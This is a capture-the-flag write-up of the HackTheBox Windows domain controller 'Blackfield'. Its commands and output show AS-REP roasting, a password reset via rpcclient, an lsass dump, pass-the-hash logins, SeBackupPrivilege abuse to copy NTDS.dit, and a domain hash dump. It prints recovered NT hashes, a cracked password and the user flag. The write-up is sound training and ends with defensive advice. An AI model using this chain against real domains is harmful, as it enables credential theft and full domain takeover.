Blackfield 10.10.10.192
I know the sky is not the limit because there are footprints on the Moon — and I made some of them! #Buzz Aldrin
Completed at 23 Sep 2020

Background

Blackfield is a Windows machine from HackTheBox, that is focusing on the enumeration technique, for training your ethical hacking skills and penetration testing skills.
After basic enumeration, this Windows server was a Domain Controller (DC) in the blackfield.local domain. After reconnaissance, a set of user's account was publicly available to view. This DC used Kerberos service. With this user list, I got a non-preauth AS_REP response. Finally, I got the access of a user 'support' account.
Using this support account, I reset the password of a user "Audit2020" and got access to this account. This account has the access rights on the ‘forensic’ shared folder and through this shared folder I could download several files, among others lass.dmp. Decode this file, I got the NTLM hash of the user account svc_backup.
This svc_backup account is the service account for system backup that is a member of the Security Group ‘Backup Operators’. This account has rights to back the critical file, NTDS.dit , and also has permission to execute the program DiskShadow.exe.
After retrieved the NTDS file and decoded it, I go the NTLM hash of the administrative account. [email protected]
Target Machine: 10.10.10.192
Attacker Machine: 10.10.14.8

Knowledge

    Windows
    Active Directory
    Powershell
    Account Misconfiguration
    Kerberoasting
    File System Forensics

Hacking Process Part 0 – Service Scanning

Quick Pre-searching

nmap -p- -T5 --min-rate=1000 10.10.10.192 -oG fkclai.nmap

Details Analysis

nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.192 -o nmap-result.txt
Enumeration strategies According to the nmap result, the target machine is a Domain Controller in the backfield.local , this server has the hostname DC01, the interesting ports are tcp/445 for SMB, 88/tcp for Kerberos, and 389/tcp for LDAP.
    1.
    Check SMB (445)
    2.
    Check kerberos-sec (88)
    3.
    Check LDAP (339)

Hacking Process Part 1 – Enumeration

SMB Enumeration

Started with the enumeration of the SMB protocol by checking the default account access, but nothing information returned. After that, using enum4linux gethered the SMB service of target machine and didn't have any usful information.
smbmap -u "guest" -p "" -H 10.10.10.192
enum4linux 10.10.10.192
Two shared folders (forensic, profiles$) are found using the smbclient and a list of user profile folder list is found at the //10.10.10.192/profiles$. It may be useful, let check this user list using

Hacking Process Part 2 – Initial Low Privilege Access

Enumeration through RPC

As the target provides the AD service, let use the folder name to create a user list file and check with GetNPUsers.py program to find out the "real" user account actually present in the Active Directory and try to capture the NTLM hash. Exported the shares to a file named ‘userlist.txt’, and check of the usernames are existing and if they have Kerberos pre-authentication enabled, using the parament -format john that sent founded captured Ticket-Gain-Tickets to john for cracking. Finally, the following three accounts existed at the Active Directory and the password of "support was found. 1. audit2020 2. support 3. svc_backup
python /root/Documents/ctf/tools/win/impacket-0.9.20/examples/GetNPUsers.py blackfield.local/ -usersfile userlist.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john
Password of the user account [email protected] was found #00^BlackKnight

Initial access with the account "support"

Login the "blackfield.local/support" account with the password ":#00^BlackKnight". It was confirmed that the user list and user gourp of the AD service. After futher recon, this account cannot access other SMB share folder and no other information can be found under this . Before swithing to other strategy, if it is a "support" account, can I do some support service, such as create account, reset account password...etc.
Googled an article explains how to change a password via rpcclient. Finally, I was able to change the password of the account audit2020 to ‘[email protected]’.
1
~$ rpcclient gt; enumdomusers
2
user:[Administrator] rid:[0x1f4]
3
user:[Guest] rid:[0x1f5]
4
user:[krbtgt] rid:[0x1f6]
5
user:[audit2020] rid:[0x44f]
6
user:[support] rid:[0x450]
7
user:[svc_backup] rid:[0x585]
8
user:[lydericlefebvre] rid:[0x586]
Copied!
1
~$ rpcclient gt; enumdomgroups
2
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
3
group:[Domain Admins] rid:[0x200]
4
group:[Domain Users] rid:[0x201]
5
group:[Domain Guests] rid:[0x202]
6
group:[Domain Computers] rid:[0x203]
7
group:[Domain Controllers] rid:[0x204]
8
group:[Schema Admins] rid:[0x206]
9
group:[Enterprise Admins] rid:[0x207]
10
group:[Group Policy Creator Owners] rid:[0x208]
11
group:[Read-only Domain Controllers] rid:[0x209]
12
group:[Cloneable Domain Controllers] rid:[0x20a]
13
group:[Protected Users] rid:[0x20d]
14
group:[Key Admins] rid:[0x20e]
15
group:[Enterprise Key Admins] rid:[0x20f]
16
group:[DnsUpdateProxy] rid:[0x44e]
Copied!

Jump to account "audit2020"

This user account can access the share folder "forensic". Jumped to this user "aduit2020", however, no luck to get the user flag. It is not the target user account. I downloaded all the files at this forensic account and found a interesting file lass.DMP under memory_analysis folder.
1
~$ smbclient //10.10.10.192/forensic -U audit2020 --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
2
Enter BLACKFIELD.LOCAL\audit2020's password:
3
Try "help" to get a list of possible commands.
4
smb: \> ls
5
. D 0 Sun Feb 23 08:03:16 2020
6
.. D 0 Sun Feb 23 08:03:16 2020
7
commands_output D 0 Sun Feb 23 13:14:37 2020
8
memory_analysis D 0 Thu May 28 16:28:33 2020
9
tools D 0 Sun Feb 23 08:39:08 2020
10
11
7846143 blocks of size 4096. 4108744 blocks available
12
smb: \> smb: \> recurse on
13
smb: \> prompt off
14
smb: \> mget *
15
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (3.8 KiloBytes/sec) (average 3.8 KiloBytes/sec)
16
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (6.8 KiloBytes/sec) (average 5.3 KiloBytes/sec)
17
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (110.8 KiloBytes/sec) (average 41.6 KiloBytes/sec)
18
getting file \commands_output\firewall_rules.txt of size 518202 as firewall_rules.txt (1284.4 KiloBytes/sec) (average 642.4 KiloBytes/sec)
19
getting file \commands_output\ipconfig.txt of size 1782 as ipconfig.txt (12.2 KiloBytes/sec) (average 548.4 KiloBytes/sec)
20
getting file \commands_output\netstat.txt of size 3842 as netstat.txt (27.6 KiloBytes/sec) (average 483.6 KiloBytes/sec)
21
getting file \commands_output\route.txt of size 3976 as route.txt (28.1 KiloBytes/sec) (average 432.6 KiloBytes/sec)
22
getting file \commands_output\systeminfo.txt of size 4550 as systeminfo.txt (30.2 KiloBytes/sec) (average 389.7 KiloBytes/sec)
23
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (69.2 KiloBytes/sec) (average 360.0 KiloBytes/sec)
24
getting file \memory_analysis\conhost.zip of size 37876530 as conhost.zip (1599.9 KiloBytes/sec) (average 1523.4 KiloBytes/sec)
25
getting file \memory_analysis\ctfmon.zip of size 24962333 as ctfmon.zip (1704.1 KiloBytes/sec) (average 1589.8 KiloBytes/sec)
26
getting file \memory_analysis\dfsrs.zip of size 23993305 as dfsrs.zip (1727.9 KiloBytes/sec) (average 1625.5 KiloBytes/sec)
27
getting file \memory_analysis\dllhost.zip of size 18366396 as dllhost.zip (1628.9 KiloBytes/sec) (average 1626.1 KiloBytes/sec)
28
getting file \memory_analysis\ismserv.zip of size 8810157 as ismserv.zip (1689.3 KiloBytes/sec) (average 1630.8 KiloBytes/sec)
29
getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (1658.7 KiloBytes/sec) (average 1638.2 KiloBytes/sec)
Copied!

memory_analysis\lsass.DMP

There is a program "volatility" under tool folder which can be used for analyzing memory dumps. This lasass.DMP may be the dump result from lsass.exe, which contains the password hash.
Tried read out the lsass.dmp using different method, first I tried with volatility to read out the DMP file, but couldn’t get it to work on my Kali machine. Finally, used the Python version of Mimikatz, pypykatz. Lucky, another user account "svc_backup" was found with a NTLM hash.
1
~$ pypykatz lsa minidump lsass.DMP
2
INFO:root:Parsing file lsass.DMP
3
FILE: ======== lsass.DMP =======
4
== LogonSession ==
5
authentication_id 406458 (633ba)
6
session_id 2
7
username svc_backup
8
domainname BLACKFIELD
9
logon_server DC01
10
logon_time 2020-02-23T18:00:03.423728+00:00
11
sid S-1-5-21-4194615774-2175524697-3563712290-1413
12
luid 406458
13
== MSV ==
14
Username: svc_backup
15
Domain: BLACKFIELD
16
LM: NA
17
NT: 9658d1d1dcd9250115e2205d9f48400d
18
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
19
== WDIGEST [633ba]==
20
username svc_backup
21
domainname BLACKFIELD
22
password None
23
== SSP [633ba]==
24
username
25
domainname
26
password None
27
== Kerberos ==
28
Username: svc_backup
29
Domain: BLACKFIELD.LOCAL
30
Password: None
31
== WDIGEST [633ba]==
32
username svc_backup
33
domainname BLACKFIELD
34
password None
Copied!
Using the Evil-WinRM I can just pass the hash to login
1
~$ evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
Copied!
This account "svc_backup" have the user flag at the Desktop folder. Let's go for Privilege Escalation.
1
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../Desktop
2
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls
3
4
5
Directory: C:\Users\svc_backup\Desktop
6
7
8
Mode LastWriteTime Length Name
9
---- ------------- ------ ----
10
-ar--- 6/18/2020 6:53 PM 34 user.txt
11
12
13
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
14
dfe91a601341819d2ca0cca082495551
Copied!

Hacking Process Part 3 – Privilege Escalation

The support account has the support fuction, audit account can access the backup file, will this svc_backup account has system backup function?
Starting check who am i and what access rights I have, A quick check on the privileges of this account that this user is member of the group "Backup Operations" and it have two ‘extra’ privileges, i.e. SeBackupPrivilege and SeRestorePrivilege which are able to back-up critical system files on this Domain Controller.
1
*Evil-WinRM* PS C:\Users\svc_backup\Documents> net user svc_backup
2
User name svc_backup
3
Full Name
4
Comment
5
User's comment
6
Country/region code 000 (System Default)
7
Account active Yes
8
Account expires Never
9
10
Password last set 2/23/2020 10:54:48 AM
11
Password expires Never
12
Password changeable 2/24/2020 10:54:48 AM
13
Password required Yes
14
User may change password Yes
15
16
Workstations allowed All
17
Logon script
18
User profile
19
Home directory
20
Last logon 2/23/2020 11:03:50 AM
21
22
Logon hours allowed All
23
24
Local Group Memberships *Backup Operators *Remote Management Use
25
Global Group memberships *Domain Users
26
The command completed successfully.
27
28
*Evil-WinRM* PS C:\Users\svc_backup\Documents>whoami /priv
29
30
PRIVILEGES INFORMATION
31
----------------------
32
33
Privilege Name Description State
34
============================= ============================== =======
35
SeMachineAccountPrivilege Add workstations to domain Enabled
36
SeBackupPrivilege Back up files and directories Enabled
37
SeRestorePrivilege Restore files and directories Enabled
38
SeShutdownPrivilege Shut down the system Enabled
39
SeChangeNotifyPrivilege Bypass traverse checking Enabled
40
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
41
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
Copied!
My target is to get the NTDS.dit file by creating a Volume Shadow Copy which the files are being locked. In addition, I need the SYSTEM hive from the registry which is containing the boot key, which is used to decrypt the NTDS.dit. Googled, diskshadow.exe is the program to use to create Volume Shadow Snapshots (VSS) of disks and expose them as a folder or as a Driveletter.

Get the NTDS.dit

Even the SeBackupPrivilege is enable, but the system security still not allow me to dump the ntds.dit file. First we need to get the permissions in the file NTDS.dit by following the instruction of this https://github.com/giuliano108/SeBackupPrivilege
1
Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module ./Set-SeBackupPrivilege.dll
2
Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module ./SeBackupPrivilegeUtils.dll
3
Evil-WinRM* PS C:\Users\svc_backup\Documents> Set-SeBackupPrivilege
4
Copied!
Once I have the privileges, next steps, execute the program DiskShadow.exe with the scripts (DiskShadow.exe /s ), which is creating a Volume Shadow Copy and expose the VSS with the Driveletter Z:.
1
set context persistent nowriters
2
set metadata c:\temp\example.cab
3
set verbose on
4
begin backup
5
add volume c:\ alias systemvolume
6
create
7
expose %systemvolume% z:
8
end backup
Copied!
1
Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s script.txt
2
Microsoft DiskShadow version 1.0
3
Copyright (C) 2013 Microsoft Corporation
4
On computer: DC01, 9/22/2020 3:00:44 PM
5
6
-> set context persistent nowriters
7
-> set metadata c:\temp\example.cab
8
-> set verbose on
9
-> begin backup
10
-> add volume c:\ alias systemvolume
11
-> create
12
13
Alias systemvolume for shadow ID {a402221f-ec65-43af-b956-3e2baa45fa43} set as environment variable.
14
Alias VSS_SHADOW_SET for shadow set ID {2520bff5-0a72-46f3-b718-e47519722936} set as environment variable.
15
Inserted file Manifest.xml into .cab file example.cab
16
Inserted file Dis5346.tmp into .cab file example.cab
17
18
Querying all shadow copies with the shadow copy set ID {2520bff5-0a72-46f3-b718-e47519722936}
19
20
* Shadow copy ID = {a402221f-ec65-43af-b956-3e2baa45fa43} %systemvolume%
21
- Shadow copy set: {2520bff5-0a72-46f3-b718-e47519722936} %VSS_SHADOW_SET%
22
- Original count of shadow copies = 1
23
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
24
- Creation time: 9/22/2020 3:00:44 PM
25
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
26
- Originating machine: DC01.BLACKFIELD.local
27
- Service machine: DC01.BLACKFIELD.local
28
- Not exposed
29
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
30
- Attributes: No_Auto_Release Persistent No_Writers Differential
31
32
Number of shadow copies listed: 1
33
-> expose %systemvolume% z:
34
-> %systemvolume% = {a402221f-ec65-43af-b956-3e2baa45fa43}
35
The shadow copy was successfully exposed as z:\.
36
-> end backup
37
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
Copied!
Using the Copy-FileSeBackupPrivilege to get the ntds.dit file and the system.bak (the key of this ntds) that get from the registry
1
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege z:\window\ntds\ntds.dit C:\Users\svc_backup\Documents\ntds.dit
2
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit
3
Info: Downloading C:\Users\svc_backup\Documents\ntds.dit to ntds.dit
4
5
Info: Download successful!
6
7
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg.exe save hklm\system .\system.bak
8
The operation completed successfully.
9
10
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.bak
11
Info: Downloading C:\Users\svc_backup\Documents\system.bak to system.bak
12
13
Info: Download successful!
14
Copied!
With the secretsdump.py to extract the NTDS.dit and read the hashes.
1
[email protected]:~/Documents/ctf/htb/windows/16_Blackfield/exploit/audit2020_file# /root/Documents/ctf/tools/win/impacket-0.9.20/examples/secretsdump.py -ntds ./ntds.dit -system ./system.bak LOCAL >dumpntds.txt
2
[email protected]:~/Documents/ctf/htb/windows/16_Blackfield/exploit/audit2020_file# cat dumpntds.txt
3
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
4
5
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
6
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
7
[*] Searching for pekList, be patient
8
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
9
[*] Reading and decrypting hashes from ./ntds.dit
10
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
11
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
12
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:9e3d10cc537937888adcc0d918813a24:::
13
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
14
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
15
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
16
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98
Copied!

Dumping to the Administrator account

With the administrator's NTML hash using the Evil-WinRM to create a session with the Administrator-account.
1
[email protected]:~/Documents/ctf/tools/win/evil-winrm# ./evil-winrm.rb -u administrator -H 184fb5e5178480be64824d4cd53b99ee -i 10.10.10.192
2
3
Evil-WinRM shell v2.0
4
5
Info: Establishing connection to remote endpoint
6
7
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
8
blackfield\administrator
9
Copied!
Got the root key

Post Exploitation

1
*Evil-WinRM* PS C:\Users\Administrator\desktop> type notes.txt
2
Mates,
3
4
After the domain compromise and computer forensic last week, auditors advised us to:
5
- change every passwords -- Done.
6
- change krbtgt password twice -- Done.
7
- disable auditor's account (audit2020) -- KO.
8
- use nominative domain admin accounts instead of this one -- KO.
9
10
We will probably have to backup & restore things later.
11
- Mike.
12
13
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
14
*Evil-WinRM* PS C:\Users\Administrator\desktop> systeminfo
15
16
Host Name: DC01
17
OS Name: Microsoft Windows Server 2019 Standard
18
OS Version: 10.0.17763 N/A Build 17763
19
OS Manufacturer: Microsoft Corporation
20
OS Configuration: Primary Domain Controller
21
OS Build Type: Multiprocessor Free
22
Registered Owner: Windows User
23
Registered Organization:
24
Product ID: 00429-00521-62775-AA435
25
Original Install Date: 2/1/2020, 12:04:40 PM
26
System Boot Time: 9/23/2020, 3:11:49 PM
27
System Manufacturer: VMware, Inc.
28
System Model: VMware Virtual Platform
29
System Type: x64-based PC
30
Processor(s): 2 Processor(s) Installed.
31
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
32
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
33
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
34
Windows Directory: C:\Windows
35
System Directory: C:\Windows\system32
36
Boot Device: \Device\HarddiskVolume1
37
System Locale: en-us;English (United States)
38
Input Locale: fr;French (France)
39
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
40
Total Physical Memory: 4,095 MB
41
Available Physical Memory: 2,540 MB
42
Virtual Memory: Max Size: 4,799 MB
43
Virtual Memory: Available: 3,387 MB
44
Virtual Memory: In Use: 1,412 MB
45
Page File Location(s): C:\pagefile.sys
46
Domain: BLACKFIELD.local
47
Logon Server: \\DC01
48
Hotfix(s): 7 Hotfix(s) Installed.
49
[01]: KB4552924
50
[02]: KB4494174
51
[03]: KB4512577
52
[04]: KB4523204
53
[05]: KB4537759
54
[06]: KB4549947
55
[07]: KB4565349
56
Network Card(s): 1 NIC(s) Installed.
57
[01]: vmxnet3 Ethernet Adapter
58
Connection Name: Ethernet0 2
59
DHCP Enabled: No
60
IP address(es)
61
[01]: 10.10.10.192
62
[02]: fe80::fc75:4ec7:3972:a98a
63
[03]: dead:beef::fc75:4ec7:3972:a98a
64
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
65
Copied!

Recommendation

This Lab is a sample of Kerberoasting attack, how to prevent it....
Mitigating the brute-forcing aspect of the attack, using the offline brute-force attack the hash dump file to get the initial access acount. Choosing a strong complex password for system account.
SMB Sharing, becareful what kinds of information be shared that may be used to exploitation. If I cannot get the potential user account list, the brute-force attack cannot be success.
Think about what your service accounts have access to, special privilege account can be a risk vectors for unauthorized access.

Reference Link

Last modified 4mo ago